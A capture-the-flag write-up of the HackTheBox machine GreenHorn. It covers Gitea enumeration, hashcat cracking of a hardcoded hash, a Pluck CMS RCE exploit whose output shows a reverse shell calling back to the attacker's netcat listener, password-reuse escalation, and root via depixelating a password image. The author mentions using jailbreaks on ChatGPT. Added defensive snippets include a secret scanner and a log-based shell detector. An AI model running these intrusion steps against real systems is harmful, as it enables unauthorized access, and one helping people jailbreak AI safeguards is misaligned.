![[gree1.png]]

## Overview

[GreenHorn](https://app.hackthebox.com/machines/GreenHorn)

**GreenHorn** is an easy-difficulty Linux machine that involves enumerating a `Gitea` repository to obtain hardcoded admin credentials for a `Pluck CMS` panel. With those credentials we can run an exploit for a vulnerability in the version of Pluck CMS that is running, which gives us a foothold in the form of a reverse shell. From there we escalate to the `junior` user by exploiting password reuse, and finally acquire the root user's password by using open source tools to de-pixelate an obscured image.

## Enumeration

Initial Nmap scan.

```
$ nmap -T4 -n -sC -sV -Pn -p- 10.129.231.80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 18:26 CST
Nmap scan report for 10.129.231.80
Host is up (0.083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://greenhorn.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=abc0976e42cfdbdf; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=XLpT1DCtF6ui0zxRWhAIaTR1Jq06MTczMzAxMjg0MDE2NzM3MjI2OQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 00:27:20 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR3JlZW5Ib3JuIiwic2hvcnRfbmFtZSI6IkdyZWVuSG9ybiIsInN0YXJ0X3VybCI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9ncmVlbmhvcm4uaHRiOjMwMDAvYX
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=35e1d78652b110a8; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=Rr2QMxxrOJdgp2AXyAAbmTdXZQ46MTczMzAxMjg0NTYxODU0MTc2MQ; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 00:27:25 GMT
|_    Content-Length: 0
```

Add `10.129.231.80 greenhorn.htb` to the `/etc/hosts` file and access the site hosted on port 80.

![[gree2.png]]

Clicking on `admin` at the bottom brings us to a login page which displays the version of Pluck running on the web server.

![[gree3.png]]

https://github.com/Mrterrestrial/CVE-2023-50564

Searching for this version of `Pluck` and associated vulnerabilities, we find an RCE (Remote Code Execution) exploit. `SearchSploit` returns the same information.
```
$ searchsploit pluck v4.7.18
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                | Path
------------------------------------------------------------------------------ ---------------------------------
Pluck v4.7.18 - Remote Code Execution (RCE)                                   | php/webapps/51592.py
pluck v4.7.18 - Stored Cross-Site Scripting (XSS)                             | php/webapps/51420.txt
------------------------------------------------------------------------------ ---------------------------------
```

https://nvd.nist.gov/vuln/detail/CVE-2023-50564

If we read the description for this exploit we are told that we need to have access to the `Pluck` admin panel. Let's take a look at what is running on `Port 3000` that we discovered earlier.

![[gree4.png]]

We're now looking at a `Gitea` page, so let's go ahead and snoop around and see what we can find.

![[gree5 1.png]]

Clicking on `Explore` we find a repository called `GreenAdmin / GreenHorn`. Let's click on it and see what's inside. We will likely be able to see the source code for the application.

![[gree6.png]]

My first thought is to check the `login.php` entry to see if there's a hardcoded or default password mentioned in the code or in the comments somewhere.

![[gree8.png]]

We see it reference a file called `pass.php`, and the `SHA512` hashing algorithm is mentioned. Let's look for the `pass.php` file and see if there's a hardcoded password hash inside.

![[gree7.png]]

Bingo! We found it and have what looks like a `SHA512` hash. Let's copy it to a file and try cracking it with `hashcat`. If you run `hashcat --identify` on your file it will come back with a few guesses, but `SHA512` should be at the top, so you can specify `-m 1700` and crack it!

```
$ hashcat -m 1700 hash /usr/share/wordlists/rockyou.txt.gz
hashcat (v6.2.6) starting

....[snipped]....
{REDACT3D P@SSWORD}
```

## Initial Access

https://nvd.nist.gov/vuln/detail/CVE-2023-50564

https://github.com/Mrterrestrial/CVE-2023-50564

![[gree9.png]]

Now that we have access to the `admin` panel, we can use one of the exploits we found online for `CVE-2023-50564` to get a reverse shell on the target. I experimented with a few of them but the one that worked best for me was the one I linked to.

```
$ python3 exploit.py
Enter the target URL (e.g., example.com): greenhorn.htb
Enter the password for target authentication: {REDACT3D P@SSWORD}
Enter your IP (for reverse shell): 10.10.14.110
Enter the port to listen on (for reverse shell): 1337
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.110:1337 ...
[*] Uploading payload to the target...
Exception in thread Thread-1 (start_listener):
Traceback (most recent call last):
  File "/usr/lib/python3.11/threading.py", line 1038, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.11/threading.py", line 975, in run
    self._target(*self._args, **self._kwargs)
  File "/home/d3adair/exploit.py", line 193, in start_listener
    server_socket.bind((Lhost, int(Lport)))
OSError: [Errno 98] Address already in use
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://greenhorn.htb/data/modules/payload/shell.php
```

Always make sure you start your `netcat` listener before running the exploit and specifying the port.

```
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.110] from (UNKNOWN) [10.129.231.80] 53732
which python python2 python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@greenhorn:~/html/pluck/data/modules/payload$
```

https://zweilosec.github.io/posts/upgrade-linux-shell/

Voila!
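The hardcoded `SHA512` hash in `pass.php` is exactly the kind of thing a repository secret scan should catch before the code ever lands on a public `Gitea`. The following is an added example (my own, not from the write-up or the Pluck project) of such a scanner: it flags bare hex digest literals assigned to variables in any committed file and reports the hash algorithm implied by their length. The `$ww` variable name is my assumption about Pluck's `pass.php`, and the file contents and digest are constructed for the demo, not the machine's real hash.

```python
import re
import tempfile
from pathlib import Path

# Hex digest lengths of the common unsalted hash functions.
HEX_DIGEST_NAMES = {32: "MD5", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}

# A bare hex literal assigned to, or compared with, a variable in PHP/JS/Python
# style source, e.g.   $ww = '<128 hex chars>';
HEX_ASSIGN = re.compile(
    r"""(?P<name>[$\w]+)\s*(?:===|==|=|:)\s*['"](?P<hex>[0-9a-fA-F]{32,128})['"]""")

SKIP_DIRS = {".git", "node_modules", "vendor"}


def scan_text(text: str, path: str) -> list[dict]:
    """Return one finding per hardcoded digest literal in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in HEX_ASSIGN.finditer(line):
            algo = HEX_DIGEST_NAMES.get(len(m.group("hex")))
            if algo is None:          # not a recognised digest length
                continue
            findings.append({"path": path, "line": lineno, "variable": m.group("name"),
                             "algorithm": algo,
                             "digest_prefix": m.group("hex")[:8]})  # never log the full hash
    return findings


def scan_tree(root: Path) -> list[dict]:
    """Scan every regular file in a checkout, skipping SKIP_DIRS."""
    findings = []
    for p in sorted(root.rglob("*")):
        rel = p.relative_to(root)
        if p.is_file() and not SKIP_DIRS & set(rel.parts):
            findings.extend(scan_text(p.read_text(errors="ignore"), rel.as_posix()))
    return findings


def demo() -> list[dict]:
    """Build a constructed mini-checkout shaped like the Pluck repo and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "data/settings").mkdir(parents=True)
        # Constructed 128-hex digest (not the machine's real hash); $ww is the
        # variable name Pluck is assumed to use in pass.php.
        (root / "data/settings/pass.php").write_text("<?php\n$ww = '" + "ab" * 64 + "';\n?>\n")
        (root / "login.php").write_text("<?php if (hash('sha512', $p) == $ww) {} ?>\n")
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}:{f['line']} {f['variable']} looks like an unsalted {f['algorithm']} hash")
```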
We now have a `netcat` reverse shell, but you should be able to upgrade to a fully interactive TTY shell by following the instructions in the article I provided.

```
www-data@greenhorn:~/html$ ls /home
git  junior
www-data@greenhorn:~/html$ ls -la /home/junior
total 76
drwxr-xr-x 3 junior junior  4096 Jun 20 06:36  .
drwxr-xr-x 4 root   root    4096 Jun 20 06:36  ..
lrwxrwxrwx 1 junior junior     9 Jun 11 14:38  .bash_history -> /dev/null
drwx------ 2 junior junior  4096 Jun 20 06:36  .cache
-rw-r----- 1 root   junior 61367 Jun 11 14:39 'Using OpenVAS.pdf'
-rw-r----- 1 root   junior    33 Dec  1 00:26  user.txt
```

Snooping around `/home` we find a folder for a user called `junior` containing the `user.txt` flag and a PDF document. Running through the list of Linux PrivEsc checks, I tried to `su` as the `junior` user using the password we found earlier for the admin panel, and was successful.

```
www-data@greenhorn:/home/junior$ su junior
Password: 
junior@greenhorn:~$ cat user.txt
{REDACT3D P@SSWORD}
```

We got the `user.txt` flag! That was pretty easy, all things considered.

```
$ ssh junior@10.129.231.80
The authenticity of host '10.129.231.80 (10.129.231.80)' can't be established.
ED25519 key fingerprint is SHA256:FrgpM50adTncJAsWACDugfF7duPzn9d6RzjZZFHNtLo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.231.80' (ED25519) to the list of known hosts.
junior@10.129.231.80: Permission denied (publickey).
```

Just to see if it was possible I tried to `SSH` as the `junior` user, but this was denied.

## Privilege Escalation

The `PDF` file is the only thing we really have to go off of, so I decided to download it to my attacker machine by spawning a Python HTTP server and downloading it via the browser.

```
junior@greenhorn:~$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.110 - - [01/Dec/2024 02:15:28] "GET / HTTP/1.1" 200 -
10.10.14.110 - - [01/Dec/2024 02:15:30] "GET /Using%20OpenVAS.pdf HTTP/1.1" 200 -
```

Let's browse to `greenhorn.htb` on Port `8000` and we should see the `PDF` file.

![[gree10.png]]

Once you have downloaded it, go ahead and open it up on your machine and let's see what is inside.

![[gree11.png]]

https://github.com/bishopfox/unredacter

https://github.com/spipm/Depix

https://github.com/JonasSchatz/DepixHMM

![[gree15.png]]

After reading the PDF, we see that it is a message from Mr. Green to the new junior user instructing him on how to launch `OpenVAS` using the `sudo /usr/sbin/openvas` command, along with a pixelated/obscured password for the `root` user. We will need a tool to `depixelate` this image. I tried seeing if ChatGPT would be willing to assist me in de-pixelating the image, however even with a few jailbreaks I couldn't get it to do what I wanted.

```
$ git clone https://github.com/spipm/Depix.git
Cloning into 'Depix'...
remote: Enumerating objects: 250, done.
remote: Counting objects: 100% (82/82), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 250 (delta 63), reused 55 (delta 55), pack-reused 168 (from 1)
Receiving objects: 100% (250/250), 845.31 KiB | 22.85 MiB/s, done.
Resolving deltas: 100% (121/121), done.
```

`Depix` was the one that worked for me, although there are alternatives. You can take a screenshot of the pixelated image in the PDF, however you can also use the `pdfimages` tool to extract the image itself from the PDF.

```
$ pdfimages -all 'Using OpenVAS.pdf' /home/d3adair/
```

Once you have extracted the image you should be able to view it like we see below.

![[gree12.png]]

Next we can use the `depix.py` tool to attempt to de-pixelate the obscured password to the best of its ability.
The tool comes with a selection of test images that

```
$ python3 depix.py -p /home/d3adair/image.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o /home/d3adair/image2.png
2024-11-30 21:01:25,983 - Loading pixelated image from /home/d3adair/image.png
2024-11-30 21:01:25,998 - Loading search image from images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-11-30 21:01:26,466 - Finding color rectangles from pixelated space
2024-11-30 21:01:26,467 - Found 252 same color rectangles
2024-11-30 21:01:26,467 - 190 rectangles left after moot filter
2024-11-30 21:01:26,467 - Found 1 different rectangle sizes
2024-11-30 21:01:26,467 - Finding matches in search image
2024-11-30 21:01:26,467 - Scanning 190 blocks with size (5, 5)
2024-11-30 21:01:26,492 - Scanning in searchImage: 0/1674
2024-11-30 21:02:05,367 - Removing blocks with no matches
2024-11-30 21:02:05,368 - Splitting single matches and multiple matches
2024-11-30 21:02:05,370 - [16 straight matches | 174 multiple matches]
2024-11-30 21:02:05,370 - Trying geometrical matches on single-match squares
2024-11-30 21:02:05,638 - [29 straight matches | 161 multiple matches]
2024-11-30 21:02:05,638 - Trying another pass on geometrical matches
2024-11-30 21:02:05,871 - [41 straight matches | 149 multiple matches]
2024-11-30 21:02:05,871 - Writing single match results to output
2024-11-30 21:02:05,872 - Writing average results for multiple matches to output
2024-11-30 21:02:08,861 - Saving output image to: /home/d3adair/image2.png
```

There are a few example images you can try, but the one provided in the example on the tool page itself, `debruinseq_notepad_Windows10_closeAndSpaced.png`, worked for me just fine.

![[gree14.png]]

You should now have a legible password. Let's try to `su` as `root` and see if it works...

```
junior@greenhorn:~$ su root
Password: 
root@greenhorn:/home/junior# cat /roort/root.txt
{REDACT3D FL@G}
```

Aaaand it does! `GreenHorn` is officially pwned.
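From the defender's side, the exploit chain in the Initial Access section leaves a clear trace in the nginx access log: an authenticated request to the Pluck admin page followed by a direct GET of a `.php` file under `/data/modules/` (the exploit output above shows `/data/modules/payload/shell.php`). The following is an added example (my own, not from the write-up or the exploit) of detection logic run over constructed log lines. `admin.php` as Pluck's admin entry point and the `action=installmodule` upload request are my assumptions about what the upload step looks like; the log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# nginx "combined" log format up to the status and size fields.
NGINX_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+')

# Pluck modules live under /data/modules/<module>/; a browser has no reason to
# request a .php file there directly, but that is exactly how the uploaded
# shell is triggered.
MODULE_PHP = re.compile(r"^/data/modules/[^/]+/[^/]+\.php(?:\?.*)?$")


def parse_line(line: str):
    """Parse one access-log line; return None for lines that do not match."""
    m = NGINX_LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return ev


def detect_module_shell(lines, window: timedelta = timedelta(minutes=10)) -> list[dict]:
    """Alert on direct requests to PHP under /data/modules/. Severity is 'high'
    when the same client used admin.php (assumed module-upload entry point)
    inside `window` beforehand, otherwise 'medium'."""
    last_admin = {}
    alerts = []
    for ev in filter(None, map(parse_line, lines)):
        if ev["path"].startswith("/admin.php"):
            last_admin[ev["ip"]] = ev["ts"]
        elif MODULE_PHP.match(ev["path"]):
            seen = last_admin.get(ev["ip"])
            correlated = seen is not None and ev["ts"] - seen <= window
            alerts.append({"ip": ev["ip"], "path": ev["path"], "status": ev["status"],
                           "severity": "high" if correlated else "medium"})
    return alerts


# Constructed sample log lines modelled on the write-up's exploit flow.
SAMPLE_LOG = [
    '10.10.14.110 - - [01/Dec/2024:00:40:01 +0000] "POST /admin.php?action=installmodule HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '10.10.14.110 - - [01/Dec/2024:00:40:03 +0000] "GET /data/modules/payload/shell.php HTTP/1.1" 200 0 "-" "python-requests/2.31"',
    '10.10.14.50 - - [01/Dec/2024:00:41:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.10.14.50 - - [01/Dec/2024:00:41:05 +0000] "GET /data/modules/blog/blog.php HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for a in detect_module_shell(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['ip']} requested {a['path']} (HTTP {a['status']})")
```

A 404 on the module path still deserves a look: it is the same probe failing, not benign traffic.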
## Conclusion

Overall, this was a very easy machine, but it's always interesting to use a tool that I've never used before (`depix.py` in this case), and although the PrivEsc vector itself was a little CTF-y, I never think it's a bad thing to learn a new technique or two.

![[gree13.png]]